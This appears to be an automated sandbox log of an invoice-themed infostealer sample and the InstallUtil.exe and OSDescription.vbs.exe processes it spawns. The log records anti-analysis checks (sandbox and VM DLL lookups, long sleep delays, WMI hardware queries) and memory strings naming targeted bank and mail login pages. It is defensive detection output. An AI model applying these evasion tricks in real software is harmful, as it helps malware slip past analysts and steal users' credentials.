Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: Fattura-24SC-99245969925904728562.vbs.exe PID: 7764, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: OSDescription.vbs.exe PID: 6024, type: MEMORYSTR
Source: c:\users\user\appdata\roaming\osdescription.vbs.exe Key value queried: Powershell behavior
Source: c:\users\user\desktop\fattura-24sc-99245969925904728562.vbs.exe Key value queried: Powershell behavior
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1377378668.0000000005095000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, OSDescription.vbs.exe, 0000000F.00000002.1547078793.0000000004BC5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: 2F90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: 47D0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Memory allocated: 8310000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 710000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2520000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2270000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory allocated: 42B0000 memory reserve | memory write watch (identical entry repeated 2 times)
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Memory allocated: 7F80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1540000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F50000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D80000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477 (identical entry repeated 2 times)
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer (identical entry repeated 3 times)
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Window / User API: threadDelayed 2695
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Window / User API: threadDelayed 3455
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 2844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5486
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Window / User API: threadDelayed 4439
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Window / User API: threadDelayed 1330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 3965
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Window / User API: threadDelayed 5802
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe TID: 7916 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -31000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30850s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30735s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30610s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30360s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30235s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -30112s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -37000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36657s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36532s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36407s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -36176s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35963s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35299s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35172s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -35047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34938s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34813s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34593s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34485s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 8036 Thread sleep time: -34266s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7948 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe TID: 2120 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -32000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31450s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31331s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31216s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -31107s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30982s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30859s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30625s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30515s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30406s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30297s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30187s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 7692 Thread sleep time: -30078s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30235
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30112
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 37000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36657
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36532
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36407
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 36176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35299
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 35047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34813
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34593
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34375
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 34266
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 32000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31331
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31216
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 31107
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30982
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30734
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30625
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30515
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30406
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30297
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30187
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 30078
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: InstallUtil.exe, 00000009.00000002.1452882158.0000000002521000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.1617686351.0000000002F6C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmGuestLib.dllDselect * from Win32_ComputerSystem
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: InstallUtil.exe, 00000009.00000002.1478557094.0000000003729000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
